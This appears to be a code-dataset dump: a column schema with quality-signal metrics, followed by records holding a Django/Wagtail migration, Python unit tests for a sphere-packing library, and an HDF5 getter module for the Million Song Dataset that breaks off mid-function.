hexsha: string
size: int64
ext: string
lang: string
max_stars_repo_path: string
max_stars_repo_name: string
max_stars_repo_head_hexsha: string
max_stars_repo_licenses: list
max_stars_count: int64
max_stars_repo_stars_event_min_datetime: string
max_stars_repo_stars_event_max_datetime: string
max_issues_repo_path: string
max_issues_repo_name: string
max_issues_repo_head_hexsha: string
max_issues_repo_licenses: list
max_issues_count: int64
max_issues_repo_issues_event_min_datetime: string
max_issues_repo_issues_event_max_datetime: string
max_forks_repo_path: string
max_forks_repo_name: string
max_forks_repo_head_hexsha: string
max_forks_repo_licenses: list
max_forks_count: int64
max_forks_repo_forks_event_min_datetime: string
max_forks_repo_forks_event_max_datetime: string
content: string
avg_line_length: float64
max_line_length: int64
alphanum_fraction: float64
qsc_code_num_words_quality_signal: int64
qsc_code_num_chars_quality_signal: float64
qsc_code_mean_word_length_quality_signal: float64
qsc_code_frac_words_unique_quality_signal: float64
qsc_code_frac_chars_top_2grams_quality_signal: float64
qsc_code_frac_chars_top_3grams_quality_signal: float64
qsc_code_frac_chars_top_4grams_quality_signal: float64
qsc_code_frac_chars_dupe_5grams_quality_signal: float64
qsc_code_frac_chars_dupe_6grams_quality_signal: float64
qsc_code_frac_chars_dupe_7grams_quality_signal: float64
qsc_code_frac_chars_dupe_8grams_quality_signal: float64
qsc_code_frac_chars_dupe_9grams_quality_signal: float64
qsc_code_frac_chars_dupe_10grams_quality_signal: float64
qsc_code_frac_chars_replacement_symbols_quality_signal: float64
qsc_code_frac_chars_digital_quality_signal: float64
qsc_code_frac_chars_whitespace_quality_signal: float64
qsc_code_size_file_byte_quality_signal: float64
qsc_code_num_lines_quality_signal: float64
qsc_code_num_chars_line_max_quality_signal: float64
qsc_code_num_chars_line_mean_quality_signal: float64
qsc_code_frac_chars_alphabet_quality_signal: float64
qsc_code_frac_chars_comments_quality_signal: float64
qsc_code_cate_xml_start_quality_signal: float64
qsc_code_frac_lines_dupe_lines_quality_signal: float64
qsc_code_cate_autogen_quality_signal: float64
qsc_code_frac_lines_long_string_quality_signal: float64
qsc_code_frac_chars_string_length_quality_signal: float64
qsc_code_frac_chars_long_word_length_quality_signal: float64
qsc_code_frac_lines_string_concat_quality_signal: float64
qsc_code_cate_encoded_data_quality_signal: float64
qsc_code_frac_chars_hex_words_quality_signal: float64
qsc_code_frac_lines_prompt_comments_quality_signal: float64
qsc_code_frac_lines_assert_quality_signal: float64
qsc_codepython_cate_ast_quality_signal: float64
qsc_codepython_frac_lines_func_ratio_quality_signal: float64
qsc_codepython_cate_var_zero_quality_signal: bool
qsc_codepython_frac_lines_pass_quality_signal: float64
qsc_codepython_frac_lines_import_quality_signal: float64
qsc_codepython_frac_lines_simplefunc_quality_signal: float64
qsc_codepython_score_lines_no_logic_quality_signal: float64
qsc_codepython_frac_lines_print_quality_signal: float64
qsc_code_num_words: int64
qsc_code_num_chars: int64
qsc_code_mean_word_length: int64
qsc_code_frac_words_unique: null
qsc_code_frac_chars_top_2grams: int64
qsc_code_frac_chars_top_3grams: int64
qsc_code_frac_chars_top_4grams: int64
qsc_code_frac_chars_dupe_5grams: int64
qsc_code_frac_chars_dupe_6grams: int64
qsc_code_frac_chars_dupe_7grams: int64
qsc_code_frac_chars_dupe_8grams: int64
qsc_code_frac_chars_dupe_9grams: int64
qsc_code_frac_chars_dupe_10grams: int64
qsc_code_frac_chars_replacement_symbols: int64
qsc_code_frac_chars_digital: int64
qsc_code_frac_chars_whitespace: int64
qsc_code_size_file_byte: int64
qsc_code_num_lines: int64
qsc_code_num_chars_line_max: int64
qsc_code_num_chars_line_mean: int64
qsc_code_frac_chars_alphabet: int64
qsc_code_frac_chars_comments: int64
qsc_code_cate_xml_start: int64
qsc_code_frac_lines_dupe_lines: int64
qsc_code_cate_autogen: int64
qsc_code_frac_lines_long_string: int64
qsc_code_frac_chars_string_length: int64
qsc_code_frac_chars_long_word_length: int64
qsc_code_frac_lines_string_concat: null
qsc_code_cate_encoded_data: int64
qsc_code_frac_chars_hex_words: int64
qsc_code_frac_lines_prompt_comments: int64
qsc_code_frac_lines_assert: int64
qsc_codepython_cate_ast: int64
qsc_codepython_frac_lines_func_ratio: int64
qsc_codepython_cate_var_zero: int64
qsc_codepython_frac_lines_pass: int64
qsc_codepython_frac_lines_import: int64
qsc_codepython_frac_lines_simplefunc: int64
qsc_codepython_score_lines_no_logic: int64
qsc_codepython_frac_lines_print: int64
effective: string
hits: int64
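
The rows below follow this schema in column order. As a minimal sketch, such a shard can be read back with any parquet-capable tool; the filename here is hypothetical, since the actual file layout is not given above:

    import pandas as pd

    # Hypothetical shard name; adjust to the real file.
    df = pd.read_parquet("shard-00000.parquet")
    print(df.dtypes)                            # should match the schema listed above
    print(df[["lang", "size", "hits"]].head())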

hexsha: dd72b3252a902552979d222dd4a18002dd348923
size: 4,969
ext: py
lang: Python
max_stars_repo_path: apps/wagtail/home/migrations/0040_auto_20210320_1241.py
max_stars_repo_name: aadrm/breakoutwagtail
max_stars_repo_head_hexsha: cf4ce09153adf2b5e14f15ffbc82bda754d427b3
max_stars_repo_licenses: [ "MIT" ]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: apps/wagtail/home/migrations/0040_auto_20210320_1241.py
max_issues_repo_name: aadrm/breakoutwagtail
max_issues_repo_head_hexsha: cf4ce09153adf2b5e14f15ffbc82bda754d427b3
max_issues_repo_licenses: [ "MIT" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: apps/wagtail/home/migrations/0040_auto_20210320_1241.py
max_forks_repo_name: aadrm/breakoutwagtail
max_forks_repo_head_hexsha: cf4ce09153adf2b5e14f15ffbc82bda754d427b3
max_forks_repo_licenses: [ "MIT" ]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
# Generated by Django 3.1.4 on 2021-03-20 12:41

from django.db import migrations, models
import django.db.models.query
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks


class Migration(migrations.Migration):

    dependencies = [
        ('home', '0039_auto_20210320_1138'),
    ]

    operations = [
        migrations.AddField(model_name='booknowpage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='booknowpage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='booknowpage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='booknowpage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='couponspage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='couponspage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='couponspage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='couponspage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='homepage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='homepage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='homepage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='homepage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='roompage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='roompage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='roompage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AddField(model_name='roompage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True)),
        migrations.AlterField(model_name='homepage', name='reviews', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True)),
        migrations.AlterField(model_name='homepage', name='reviews_de', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True)),
        migrations.AlterField(model_name='homepage', name='reviews_en', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True)),
        migrations.AlterField(model_name='roompage', name='gallery', field=wagtail.core.fields.StreamField([('gallery', wagtail.core.blocks.StructBlock([('gallery', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alt', wagtail.core.blocks.CharBlock())])))]))], blank=True, null=True)),
        migrations.AlterField(model_name='roompage', name='reviews', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True)),
    ]
avg_line_length: 40.398374
max_line_length: 298
alphanum_fraction: 0.610384
qsc_*_quality_signal:
  code_num_words=528, code_num_chars=4,969, code_mean_word_length=5.558712,
  code_frac_words_unique=0.128788, code_frac_chars_top_2grams=0.064395,
  code_frac_chars_top_3grams=0.122658, code_frac_chars_top_4grams=0.147189,
  code_frac_chars_dupe_5grams=0.856899, code_frac_chars_dupe_6grams=0.845656,
  code_frac_chars_dupe_7grams=0.845656, code_frac_chars_dupe_8grams=0.845656,
  code_frac_chars_dupe_9grams=0.845656, code_frac_chars_dupe_10grams=0.823509,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0.021591,
  code_frac_chars_whitespace=0.263635, code_size_file_byte=4,969,
  code_num_lines=122, code_num_chars_line_max=299, code_num_chars_line_mean=40.729508,
  code_frac_chars_alphabet=0.780541, code_frac_chars_comments=0.009056,
  code_cate_xml_start=0, code_frac_lines_dupe_lines=0.87069, code_cate_autogen=1,
  code_frac_lines_long_string=0, code_frac_chars_string_length=0.124746,
  code_frac_chars_long_word_length=0.004673, code_frac_lines_string_concat=0,
  code_cate_encoded_data=0, code_frac_chars_hex_words=0,
  code_frac_lines_prompt_comments=0, code_frac_lines_assert=0,
  codepython_cate_ast=1, codepython_frac_lines_func_ratio=0,
  codepython_cate_var_zero=false, codepython_frac_lines_pass=0,
  codepython_frac_lines_import=0.043103, codepython_frac_lines_simplefunc=0,
  codepython_score_lines_no_logic=0.068966, codepython_frac_lines_print=0
qsc_* (no _quality_signal suffix):
  code_num_words=0, code_num_chars=0, code_mean_word_length=0,
  code_frac_words_unique=null, code_frac_chars_top_2grams=0,
  code_frac_chars_top_3grams=0, code_frac_chars_top_4grams=0,
  code_frac_chars_dupe_5grams=1, code_frac_chars_dupe_6grams=1,
  code_frac_chars_dupe_7grams=1, code_frac_chars_dupe_8grams=1,
  code_frac_chars_dupe_9grams=1, code_frac_chars_dupe_10grams=1,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0,
  code_frac_chars_whitespace=0, code_size_file_byte=0, code_num_lines=0,
  code_num_chars_line_max=0, code_num_chars_line_mean=0,
  code_frac_chars_alphabet=0, code_frac_chars_comments=0, code_cate_xml_start=0,
  code_frac_lines_dupe_lines=1, code_cate_autogen=1, code_frac_lines_long_string=0,
  code_frac_chars_string_length=0, code_frac_chars_long_word_length=0,
  code_frac_lines_string_concat=null, code_cate_encoded_data=0,
  code_frac_chars_hex_words=0, code_frac_lines_prompt_comments=0,
  code_frac_lines_assert=0, codepython_cate_ast=0,
  codepython_frac_lines_func_ratio=0, codepython_cate_var_zero=0,
  codepython_frac_lines_pass=0, codepython_frac_lines_import=0,
  codepython_frac_lines_simplefunc=0, codepython_score_lines_no_logic=0,
  codepython_frac_lines_print=0
effective: 0
hits: 8
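
The simple per-file statistics can be approximated from `content` directly. A minimal sketch, assuming the obvious definitions; the exact conventions behind these columns are an assumption (note the off-by-one between max_line_length=298 and qsc_code_num_chars_line_max_quality_signal=299 in the row above, which suggests slightly different line-splitting conventions):

    def simple_stats(content):
        # Assumed definitions: mean characters per line, longest line, and
        # the alphanumeric character fraction of the whole file.
        lines = content.split("\n")
        avg_line_length = len(content) / len(lines)
        max_line_length = max(len(line) for line in lines)
        alphanum_fraction = sum(c.isalnum() for c in content) / len(content)
        return avg_line_length, max_line_length, alphanum_fraction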

hexsha: dd7b2306b44d814d31e3c9556dc2277accbe1807
size: 9,435
ext: py
lang: Python
max_stars_repo_path: particle_packing/tests/test_sphere.py
max_stars_repo_name: aluchies/particle_packing
max_stars_repo_head_hexsha: 127603a519ae25979de6c6197810a7ea38ec945b
max_stars_repo_licenses: [ "BSD-3-Clause" ]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: particle_packing/tests/test_sphere.py
max_issues_repo_name: aluchies/particle_packing
max_issues_repo_head_hexsha: 127603a519ae25979de6c6197810a7ea38ec945b
max_issues_repo_licenses: [ "BSD-3-Clause" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: particle_packing/tests/test_sphere.py
max_forks_repo_name: aluchies/particle_packing
max_forks_repo_head_hexsha: 127603a519ae25979de6c6197810a7ea38ec945b
max_forks_repo_licenses: [ "BSD-3-Clause" ]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
from particle_packing import sphere
import unittest
import numpy as np
from scipy.spatial.distance import pdist


class TestCode(unittest.TestCase):

    """ pack.grid_md() """

    def test1_pack_grid_md(self):
        """ Test case with zero points. """
        x, y, z = sphere.pack.grid_md(npoints=0, radius=0.05)
        self.assertTrue(x.size == 0)
        self.assertTrue(y.size == 0)
        self.assertTrue(z.size == 0)

    def test2_pack_grid_md(self):
        """ Test case with default arguments. """
        npoints = 5
        radius = 0.05
        x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius)
        self.assertTrue(x.size == npoints)
        self.assertTrue(y.size == npoints)
        self.assertTrue(z.size == npoints)

    def test3_pack_grid_md(self):
        """ Test case with npoints large """
        npoints = 500
        radius = 0.05
        x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius)
        self.assertTrue(x.size == npoints)
        self.assertTrue(y.size == npoints)
        self.assertTrue(z.size == npoints)
        xyz = np.vstack([x, y, z]).transpose()
        d = pdist(xyz)
        self.assertTrue(d.min() > 2. * radius)

    def test4_pack_grid_md(self):
        """ Test case with npoints too large """
        npoints = 1000
        radius = 0.05
        self.assertRaises(ValueError, sphere.pack.grid_md, npoints, 0.05)

    """ pack.metro_md() """

    def test1_pack_metro_md(self):
        """ Test case with npoints small """
        npoints = 5
        radius = 0.05
        step_limit = 10 ** 2
        x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius)
        success_steps = sphere.pack.metro_md(x, y, z, radius, step_limit)
        for i in xrange(len(x)):
            self.assertTrue(x[i] > radius)
            self.assertTrue(x[i] < 1. - radius)
            self.assertTrue(y[i] > radius)
            self.assertTrue(y[i] < 1. - radius)
            self.assertTrue(z[i] > radius)
            self.assertTrue(z[i] < 1. - radius)
        xyz = np.vstack([x, y, z]).transpose()
        d = pdist(xyz)
        self.assertTrue(d.min() > 2. * radius)
        self.assertTrue(success_steps > 0)

    def test2_pack_metro_md(self):
        """ Test case with npoints small """
        npoints = 500
        radius = 0.05
        step_limit = 10 ** 3
        x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius)
        success_steps = sphere.pack.metro_md(x, y, z, radius, step_limit)
        for i in xrange(len(x)):
            self.assertTrue(x[i] > radius)
            self.assertTrue(x[i] < 1. - radius)
            self.assertTrue(y[i] > radius)
            self.assertTrue(y[i] < 1. - radius)
            self.assertTrue(z[i] > radius)
            self.assertTrue(z[i] < 1. - radius)
        xyz = np.vstack([x, y, z]).transpose()
        d = pdist(xyz)
        self.assertTrue(d.min() > 2. * radius)
        self.assertTrue(success_steps > 0)

    def test3_pack_metro_md(self):
        """ Test case random seed """
        x0 = np.ascontiguousarray([0.1, 0.3, 0.5])
        y0 = np.ascontiguousarray([0.1, 0.3, 0.5])
        z0 = np.ascontiguousarray([0.1, 0.3, 0.5])
        x1 = np.ascontiguousarray([0.1, 0.3, 0.5])
        y1 = np.ascontiguousarray([0.1, 0.3, 0.5])
        z1 = np.ascontiguousarray([0.1, 0.3, 0.5])
        radius = 0.05
        step_limit = 10 ** 3
        randSeed = 100
        success_steps0 = sphere.pack.metro_md(x0, y0, z0, radius, step_limit, randSeed)
        success_steps1 = sphere.pack.metro_md(x1, y1, z1, radius, step_limit, randSeed)
        self.assertTrue(np.allclose(x0, x1))
        self.assertTrue(np.allclose(y0, y1))
        self.assertTrue(np.allclose(z0, z1))

    def test4_pack_metro_md(self):
        """ Test case when all steps are successful """
        npoints = 500
        radius = 0.0
        step_limit = 10 ** 3
        x, y, z = sphere.pack.poisson_point(npoints=npoints)
        success_steps = sphere.pack.metro_md(x, y, z, radius, step_limit)
        self.assertTrue(success_steps == step_limit)

    """ pack.metro_pd() """

    def test1_pack_metro_pd(self):
        """ Test case with npoints small """
        npoints = 5
        radius = 0.05
        step_limit = 10 ** 2
        x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius)
        radius = np.ascontiguousarray(0.05 * np.ones(npoints))
        success_steps = sphere.pack.metro_pd(x, y, z, radius, step_limit)
        for i in xrange(len(x)):
            self.assertTrue(x[i] > radius[i])
            self.assertTrue(x[i] < 1. - radius[i])
            self.assertTrue(y[i] > radius[i])
            self.assertTrue(y[i] < 1. - radius[i])
            self.assertTrue(z[i] > radius[i])
            self.assertTrue(z[i] < 1. - radius[i])
        xyz = np.vstack([x, y, z]).transpose()
        d = pdist(xyz)
        self.assertTrue(d.min() > 2. * radius.min())
        self.assertTrue(success_steps > 0)

    def test2_pack_metro_pd(self):
        """ Test case with npoints small """
        npoints = 500
        radius = 0.05
        step_limit = 10 ** 3
        x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius)
        radius = np.ascontiguousarray(0.05 * np.ones(npoints))
        success_steps = sphere.pack.metro_pd(x, y, z, radius, step_limit)
        for i in xrange(len(x)):
            self.assertTrue(x[i] > radius[i])
            self.assertTrue(x[i] < 1. - radius[i])
            self.assertTrue(y[i] > radius[i])
            self.assertTrue(y[i] < 1. - radius[i])
            self.assertTrue(z[i] > radius[i])
            self.assertTrue(z[i] < 1. - radius[i])
        xyz = np.vstack([x, y, z]).transpose()
        d = pdist(xyz)
        self.assertTrue(d.min() > 2. * radius.min())
        self.assertTrue(success_steps > 0)

    def test3_pack_metro_pd(self):
        """ Test case random seed """
        x0 = np.ascontiguousarray([0.1, 0.3, 0.5])
        y0 = np.ascontiguousarray([0.1, 0.3, 0.5])
        z0 = np.ascontiguousarray([0.1, 0.3, 0.5])
        x1 = np.ascontiguousarray([0.1, 0.3, 0.5])
        y1 = np.ascontiguousarray([0.1, 0.3, 0.5])
        z1 = np.ascontiguousarray([0.1, 0.3, 0.5])
        radius = 0.05
        step_limit = 10 ** 3
        randSeed = 100
        npoints = 3
        radius = np.ascontiguousarray(0.05 * np.ones(npoints))
        success_steps0 = sphere.pack.metro_pd(x0, y0, z0, radius, step_limit, randSeed)
        success_steps1 = sphere.pack.metro_pd(x1, y1, z1, radius, step_limit, randSeed)
        self.assertTrue(np.allclose(x0, x1))
        self.assertTrue(np.allclose(y0, y1))
        self.assertTrue(np.allclose(z0, z1))

    def test4_pack_metro_pd(self):
        """ Test case when all steps are successful """
        npoints = 500
        radius = 0.0
        radius = np.ascontiguousarray(radius * np.ones(npoints))
        step_limit = 10 ** 3
        x, y, z = sphere.pack.poisson_point(npoints=npoints)
        success_steps = sphere.pack.metro_pd(x, y, z, radius, step_limit)
        self.assertTrue(success_steps == step_limit)

    """ pack.rsa_md() """

    def test1_pack_rsa_md(self):
        """ Test case with npoints small """
        npoints = 5
        radius = 0.05
        step_limit = 10 ** 2
        x, y, z = sphere.pack.rsa_md(npoints, radius, step_limit)
        for i in xrange(len(x)):
            self.assertTrue(x[i] > radius)
            self.assertTrue(x[i] < 1. - radius)
            self.assertTrue(y[i] > radius)
            self.assertTrue(y[i] < 1. - radius)
            self.assertTrue(z[i] > radius)
            self.assertTrue(z[i] < 1. - radius)
        xyz = np.vstack([x, y, z]).transpose()
        d = pdist(xyz)
        self.assertTrue(d.min() > 2. * radius)
        self.assertTrue(npoints == len(x))

    def test2_pack_rsa_md(self):
        """ Test case with npoints large """
        npoints = 250
        radius = 0.05
        step_limit = 10 ** 4
        x, y, z = sphere.pack.rsa_md(npoints, radius, step_limit)
        for i in xrange(len(x)):
            self.assertTrue(x[i] > radius)
            self.assertTrue(x[i] < 1. - radius)
            self.assertTrue(y[i] > radius)
            self.assertTrue(y[i] < 1. - radius)
            self.assertTrue(z[i] > radius)
            self.assertTrue(z[i] < 1. - radius)
        xyz = np.vstack([x, y, z]).transpose()
        d = pdist(xyz)
        self.assertTrue(d.min() > 2. * radius)
        self.assertTrue(npoints == len(x))

    def test3_pack_rsa_md(self):
        """ Test case random seed """
        npoints = 5
        radius = 0.05
        step_limit = 10 ** 3
        randSeed = 100
        x0, y0, z0 = sphere.pack.rsa_md(npoints, radius, step_limit, randSeed)
        x1, y1, z1 = sphere.pack.rsa_md(npoints, radius, step_limit, randSeed)
        self.assertTrue(np.allclose(x0, x1))
        self.assertTrue(np.allclose(y0, y1))
        self.assertTrue(np.allclose(z0, z1))


if __name__ == '__main__':
    print 'Running unit tests for sphere.so'
    unittest.main()
avg_line_length: 24.634465
max_line_length: 77
alphanum_fraction: 0.540329
qsc_*_quality_signal:
  code_num_words=1,246, code_num_chars=9,435, code_mean_word_length=3.991172,
  code_frac_words_unique=0.081059, code_frac_chars_top_2grams=0.194249,
  code_frac_chars_top_3grams=0.104565, code_frac_chars_top_4grams=0.038608,
  code_frac_chars_dupe_5grams=0.898653, code_frac_chars_dupe_6grams=0.886588,
  code_frac_chars_dupe_7grams=0.869696, code_frac_chars_dupe_8grams=0.85924,
  code_frac_chars_dupe_9grams=0.826664, code_frac_chars_dupe_10grams=0.795898,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0.046479,
  code_frac_chars_whitespace=0.322735, code_size_file_byte=9,435,
  code_num_lines=383, code_num_chars_line_max=78, code_num_chars_line_mean=24.634465,
  code_frac_chars_alphabet=0.731768, code_frac_chars_comments=0,
  code_cate_xml_start=0, code_frac_lines_dupe_lines=0.80402, code_cate_autogen=0,
  code_frac_lines_long_string=0, code_frac_chars_string_length=0.00469,
  code_frac_chars_long_word_length=0, code_frac_lines_string_concat=0,
  code_cate_encoded_data=0, code_frac_chars_hex_words=0,
  code_frac_lines_prompt_comments=0, code_frac_lines_assert=0.351759,
  codepython_cate_ast=0, codepython_frac_lines_func_ratio=null,
  codepython_cate_var_zero=null, codepython_frac_lines_pass=0,
  codepython_frac_lines_import=0.020101, codepython_frac_lines_simplefunc=null,
  codepython_score_lines_no_logic=null, codepython_frac_lines_print=0.005025
qsc_* (no _quality_signal suffix):
  code_num_words=0, code_num_chars=0, code_mean_word_length=0,
  code_frac_words_unique=null, code_frac_chars_top_2grams=0,
  code_frac_chars_top_3grams=0, code_frac_chars_top_4grams=0,
  code_frac_chars_dupe_5grams=1, code_frac_chars_dupe_6grams=1,
  code_frac_chars_dupe_7grams=1, code_frac_chars_dupe_8grams=1,
  code_frac_chars_dupe_9grams=1, code_frac_chars_dupe_10grams=1,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0,
  code_frac_chars_whitespace=0, code_size_file_byte=0, code_num_lines=0,
  code_num_chars_line_max=0, code_num_chars_line_mean=0,
  code_frac_chars_alphabet=0, code_frac_chars_comments=0, code_cate_xml_start=0,
  code_frac_lines_dupe_lines=1, code_cate_autogen=0, code_frac_lines_long_string=0,
  code_frac_chars_string_length=0, code_frac_chars_long_word_length=0,
  code_frac_lines_string_concat=null, code_cate_encoded_data=0,
  code_frac_chars_hex_words=0, code_frac_lines_prompt_comments=0,
  code_frac_lines_assert=0, codepython_cate_ast=1,
  codepython_frac_lines_func_ratio=0, codepython_cate_var_zero=0,
  codepython_frac_lines_pass=0, codepython_frac_lines_import=0,
  codepython_frac_lines_simplefunc=0, codepython_score_lines_no_logic=0,
  codepython_frac_lines_print=0
effective: 0
hits: 8
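
The duplicated n-gram signals (code_frac_chars_dupe_5grams and friends) measure how repetitive a file is; formulaic test code like the file above scores high. A minimal sketch of one plausible definition, assuming it means the fraction of characters covered by word n-grams that occur more than once; the dataset's exact definition is not stated here:

    from collections import Counter

    def frac_chars_dupe_ngrams(text, n=5):
        # Split on whitespace and count word n-grams.
        words = text.split()
        if len(words) < n:
            return 0.0
        grams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
        counts = Counter(grams)
        # Mark every word that falls inside a duplicated n-gram.
        dupe = [False] * len(words)
        for i, gram in enumerate(grams):
            if counts[gram] > 1:
                for j in range(i, i + n):
                    dupe[j] = True
        total = sum(len(w) for w in words)
        covered = sum(len(w) for w, d in zip(words, dupe) if d)
        return covered / total if total else 0.0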

hexsha: 06be84476e42a86a0bf2ae266a2a3808b2343aaf
size: 21,631
ext: py
lang: Python
max_stars_repo_path: hdf5_getters.py
max_stars_repo_name: greysou1/Million-Song-Dataset-HDF5-to-CSV
max_stars_repo_head_hexsha: 717270af89b37be8afe294160531d4104e49061c
max_stars_repo_licenses: [ "MIT" ]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: hdf5_getters.py
max_issues_repo_name: greysou1/Million-Song-Dataset-HDF5-to-CSV
max_issues_repo_head_hexsha: 717270af89b37be8afe294160531d4104e49061c
max_issues_repo_licenses: [ "MIT" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: hdf5_getters.py
max_forks_repo_name: greysou1/Million-Song-Dataset-HDF5-to-CSV
max_forks_repo_head_hexsha: 717270af89b37be8afe294160531d4104e49061c
max_forks_repo_licenses: [ "MIT" ]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
""" Thierry Bertin-Mahieux (2010) Columbia University tb2332@columbia.edu This code contains a set of getters functions to access the fields from an HDF5 song file (regular file with one song or aggregate / summary file with many songs) This is part of the Million Song Dataset project from LabROSA (Columbia University) and The Echo Nest. Copyright 2010, Thierry Bertin-Mahieux This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import numpy as np import h5py def open_h5_file_read(h5_file): """ loads the songs attributes from the metadata key """ return h5py.File(h5_file) # def get_song_id(songH5File): # return songH5File['metadata']['songs'][] def get_num_songs(h5): """ Return the number of songs contained in this h5 file, i.e. the number of rows for all basic informations like name, artist, ... """ return h5.root.metadata.songs.nrows def get_artist_familiarity(h5,songidx=0): """ Get artist familiarity from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_familiarity'][songidx] def get_artist_hotttnesss(h5,songidx=0): """ Get artist hotttnesss from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_hotttnesss'][songidx] def get_artist_id(h5,songidx=0): """ Get artist id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_id'][songidx] def get_artist_mbid(h5,songidx=0): """ Get artist musibrainz id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_mbid'][songidx] def get_artist_playmeid(h5,songidx=0): """ Get artist playme id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_playmeid'][songidx] def get_artist_7digitalid(h5,songidx=0): """ Get artist 7digital id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_7digitalid'][songidx] def get_artist_latitude(h5,songidx=0): """ Get artist latitude from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_latitude'][songidx] def get_artist_longitude(h5,songidx=0): """ Get artist longitude from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_longitude'][songidx] def get_artist_location(h5,songidx=0): """ Get artist location from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_location'][songidx] def get_artist_name(h5,songidx=0): """ Get artist name from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_name'][songidx] def get_release(h5,songidx=0): """ Get release from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['release'][songidx] def get_release_7digitalid(h5,songidx=0): """ Get release 7digital id from a HDF5 song file, by default the first song in it """ return 
h5['metadata']['songs']['release_7digitalid'][songidx] def get_song_id(h5,songidx=0): """ Get song id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['song_id'][songidx] def get_song_hotttnesss(h5,songidx=0): """ Get song hotttnesss from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['song_hotttnesss'][songidx] def get_title(h5,songidx=0): """ Get title from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['title'][songidx] def get_track_7digitalid(h5,songidx=0): """ Get track 7digital id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['track_7digitalid'][songidx] def get_similar_artists(h5,songidx=0): """ Get similar artists array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return 